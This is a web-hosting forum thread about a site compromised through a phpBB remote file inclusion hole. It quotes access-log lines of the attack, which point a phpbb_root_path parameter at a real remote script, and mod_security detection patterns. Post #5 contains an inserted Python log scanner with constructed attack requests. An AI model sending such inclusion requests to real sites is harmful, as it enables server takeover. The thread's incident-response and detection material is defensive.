This is a discussion on help! all1count web trojan / downloader in the Shared & Semi-Dedicated forum

  1. #1
    JPC Senior Member
    Join Date
    Jul 2004
    Posts
    70

    help! all1count web trojan / downloader

    My site is infected with this - www.themes.co.nz - I have been told it's not too nasty, but I just can't find where it is! The warning comes up even if I disable Javascript... can someone help me please!

    I have even tried a find and replace on the name, but it must be happening before the html/js is output to the browser. It's got me stumped.

    TIA

    -lobos

  2. #2
    Vin DSL (Yeah, I know a LOT!)
    Join Date
    Mar 2003
    Location
    Arizona Uplands
    Posts
    10,775
    You're talking about this, right?

    What are you waiting for? Get over to here and buy 'em 'cause the time grows short (who knows when Lobos could regain his sanity).
    DISCLAIMER Any resemblance between the views expressed above and those of the owners and operators of this system is purely coincidental. Any resemblance between these views and my own is non-deterministic. The existence of Vin DSL is questionable. The existence of views in the absence of anyone to hold them is problematic. The existence of the reader is left as an exercise in the second-order coefficient.

    No Guts, No Story! VinDSL © 2010

  3. #3
    Vin DSL (Yeah, I know a LOT!)
    Join Date
    Mar 2003
    Location
    Arizona Uplands
    Posts
    10,775
    Um... you're NOT actually insane, right? Like seeing things?!?!?

    I'm confused! I don't see anything wrong...

    Can you explain the situation a little further?

  4. #4
    JPC Senior Member
    Join Date
    Jul 2004
    Posts
    70
    Sorry Vin, hahahahahaha I just reread that post (I had to duck out before proofing it properly and I just posted), and I can see where you could have got confused...

    What I meant to do was connect the title of the OP to the info (did you read the title?)... but anyway I am having trouble with the all1count web trojan / downloader. Every time I visit a page on themes.co.nz I get a big red apple of a warning from Nod...

    I have run a find and replace on the actual data output to the browser as I thought there was some js code injected somewhere, but it's not - it is coming from somewhere else... I disabled JS and it still runs... it's got me effed where the thing is coming from...

    Any advice or help you could give me would be very much appreciated thank you.

    -Lobos

  5. #5
    JPC Senior Member
    Join Date
    Jul 2004
    Posts
    70
    Well it seems I am effed. My friend just sent me this:

    Comments: I sent you a PM at Carls forums, but not
    sure if it made it thru. So I'll send this to you
    here as well.


    --------------------------

    Hi there,

    Visited pn today and saw the news about the phpbb
    exploit then saw your posts...


    I looked at my log and found this:

    212.110.128.68 - - [02/Aug/2007:21:27:01 -0400] "GET /index.php?name=PNphpBB2&file=viewtopic&p =254/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http ://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 200 47287 "-" "libwww-perl/5.803"
    212.110.128.68 - - [02/Aug/2007:21:27:03 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http ://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 200 5 "-" "libwww-perl/5.803"

    If you go to:
    http://usuarios.arnet.com.ar/larry123/safe.txt

    You will see some kind of code....

    Hmmmmm...

    Anyway do you have any experience with this type
    of thing?

    Thanks

    --------------------------

    Matter of fact I do. Most all server admins do.
    And that's why many are now banning the use of
    any form of phpbb on their servers. Myself
    included.

    That script in your logs, and MANY others like it,
    give access to your server. Once they are in, all
    hope is lost. Time for a reload of the server, not
    just the site.

    Want to stay safe-er? Install mod security on your
    server with a very strict ruleset, or move to a
    host who has protections in place to help fend off
    these attacks, for you.

    Or better yet, give up on phpbb altogether and
    convert out of it.

    http://www.simplemachines.org/download/?converters

    Hard for me to believe you would even still use
    it, I read your posts and felt compelled to send
    you a message.

    2.6 million hits on google.
    http://www.google.com/search?hl=en&q=phpbb+hacked

    Doesn't take a brain surgeon to see the writing on
    the wall bud.

    This below, is what your log should look like. As
    you know I used to run phpbb myself, YEARS ago. I
    do not have any phpbb scripts on any of my
    servers.

    The attacks STILL come, often.



    [Tue Jul 31 13:29:20 2007] [error] [client 195.242.211.140] mod_security: Access denied with code 406. Pattern match "=(http|www|ftp)\\\\:/(.+)\\\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\\\x20?\\\\?" at REQUEST_URI [id "390144"][rev "1"] [msg "Rootkit attack: Generic Attempt to install rootkit"] [severity "CRITICAL"] [hostname "www.access.siteshostedby.info"] [uri "/archive/index.php//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http ://usuarios.arnet.com.ar/larry123/safe.txt?"]
    [Tue Jul 31 13:29:21 2007] [error] [client 195.242.211.140] mod_security: Access denied with code 406. Pattern match "=(http|www|ftp)\\\\:/(.+)\\\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\\\x20?\\\\?" at REQUEST_URI [id "390144"][rev "1"] [msg "Rootkit attack: Generic Attempt to install rootkit"] [severity "CRITICAL"] [hostname "www.access.siteshostedby.info"] [uri "//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http ://usuarios.arnet.com.ar/larry123/safe.txt?"]
    Hope that helps some. Best of luck.

    --------------------------

    So what do I do now?

    -Lobos
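    The two access-log entries and the mod_security hits quoted in the message above show the same thing from two sides: a request whose parameter value is itself a URL to a remote text file, answered 200 on the unprotected host and refused with 406 where the rule fired. The script below is an added example (it is not from this thread, from phpBB, or from mod_security) that applies the rule's idea to an Apache combined-format access log so an admin without mod_security can find such requests after the fact. The log lines, the IP addresses and the remote host in it are constructed; the regex is a rewrite of the quoted rule's pattern, not the rule itself.

```python
import re
from urllib.parse import unquote

# Apache "combined" access-log format, as in the lines quoted above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# Extensions the quoted mod_security rule (id 390144) looks for after a
# remote URL in a parameter value. This is a rewrite of the same idea, not
# the rule itself: "<param>=<scheme>://<host>/<path>.<ext>", optionally
# followed by "?", and then the end of that parameter.
REMOTE_EXT = r'c|dat|kek|gif|jpe?g|png|sh|txt|bmp|js|html?|tmp|asp|php'
RFI_RE = re.compile(
    r'[?&](?P<param>[\w\[\]]+)='
    r'(?P<remote>(?:https?|ftp)://[^&\s"]+?\.(?:' + REMOTE_EXT + r')\??)'
    r'(?=&|$)',
    re.IGNORECASE,
)


def parse_line(line):
    """Split one access-log line into fields; None if it is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_rfi(uri):
    """Return (param, remote_url) pairs for every parameter whose value is a
    remote file URL. The URI is percent-decoded first so an encoded
    'http%3A%2F%2F' is caught as well as a bare 'http://'."""
    decoded = unquote(uri)
    return [(m.group('param'), m.group('remote')) for m in RFI_RE.finditer(decoded)]


def scan(log_text):
    """Walk a log and report each RFI-style request with the context a
    responder wants: who sent it, whether the server answered 200 (the request
    reached the script) or refused it, and whether the client looks scripted."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for param, remote in find_rfi(rec['uri']):
            findings.append({
                'ip': rec['ip'],
                'ts': rec['ts'],
                'param': param,
                'remote': remote,
                'status': int(rec['status']),
                'served': rec['status'] == '200',
                'scripted_client': rec['ua'].lower().startswith('libwww-perl'),
            })
    return findings


def by_source(findings):
    """Count findings per client IP, most active first."""
    counts = {}
    for f in findings:
        counts[f['ip']] = counts.get(f['ip'], 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


# Constructed sample: same shape as the thread's log, but with documentation
# IP ranges and a placeholder remote host instead of the real ones.
SAMPLE_LOG = """\
203.0.113.5 - - [02/Aug/2007:21:27:01 -0400] "GET /index.php?name=PNphpBB2&file=viewtopic&p=254/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://198.51.100.7/~probe/safe.txt? HTTP/1.1" 200 47287 "-" "libwww-perl/5.803"
203.0.113.5 - - [02/Aug/2007:21:27:03 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http%3A%2F%2F198.51.100.7%2F~probe%2Fsafe.txt%3F HTTP/1.1" 200 5 "-" "libwww-perl/5.803"
198.51.100.23 - - [02/Aug/2007:21:30:10 -0400] "GET /index.php?name=PNphpBB2&file=viewtopic&t=12 HTTP/1.1" 200 8812 "http://www.example.com/" "Mozilla/5.0"
"""

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        flag = 'SERVED' if f['served'] else 'refused'
        print(f"{f['ts']} {f['ip']} {f['param']}={f['remote']} [{flag}]")
    print(by_source(scan(SAMPLE_LOG)))
```

    Two caveats when reading the output. A 200 only means the request reached the script and got a page back; whether the remote file was actually included depends on the PHP configuration and the script version, so a served hit is a reason to check the account, not proof by itself. And the mod_security lines in the message are from the Apache error log, which has a different layout; this scanner reads the access log, where the same requests appear as ordinary GETs.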

  6. #6
    Gwaihir (the Windlord)
    Join Date
    Jun 2002
    Posts
    2,562
    Sorry to hear you got hacked. First, you should IMHO alert support as to what happened. Your hacked account might right now already be used for all sorts of nasty things. They'll want to put a stop to that, as well as make sure the server as a whole comes to no harm.

    Your friend is right that it is best to restart as cleanly as possible. You could request support to install your account afresh. If you want them to restore from a backup they made (rather than you doing that from your own) there may be a fee though. Then: be sure to upgrade your phpbb (and any other scripts you use) to their latest version right away, even before opening the site to the public.

    Some of the other stuff your friend says is big BS though. To my knowledge there hasn't been a serious exploit for phpbb in a long time, so you must be running a very old version.
    Quote Originally Posted by lobos:
    Or better yet, give up on phpbb all together and
    convert out of it.

    http://www.simplemachines.org/download/?converters

    Hard for me to believe you would even still use
    it, I read your posts and felt compelled to send
    you a message.

    2.6 million hits on google.
    http://www.google.com/search?hl=en&q=phpbb+hacked

    Doesn't take a brain surgeon to see the writing on
    the wall bud.

    1.95 million hits on google: http://www.google.nl/search?hl=nl&q=smf+hacked

    Seeing as how SMF hasn't been around nearly as long and has a smaller installed base, those numbers - if they mean anything at all - portray it as a good bit worse than phpbb, not better.

    The point though, is the same for phpbb, SMF or any other popular script: you need to make sure you keep it up to date. Whenever there's a new version out that fixes security issues, update to it, or you WILL find yourself hacked sooner or later.
    Regards,

    Wim Heemskerk
    ---
    Visit MeCCG.net - Cardgaming in J.R.R. Tolkien's Middle-earth
    And Gwaihir.net - The Middle-earth CCG store
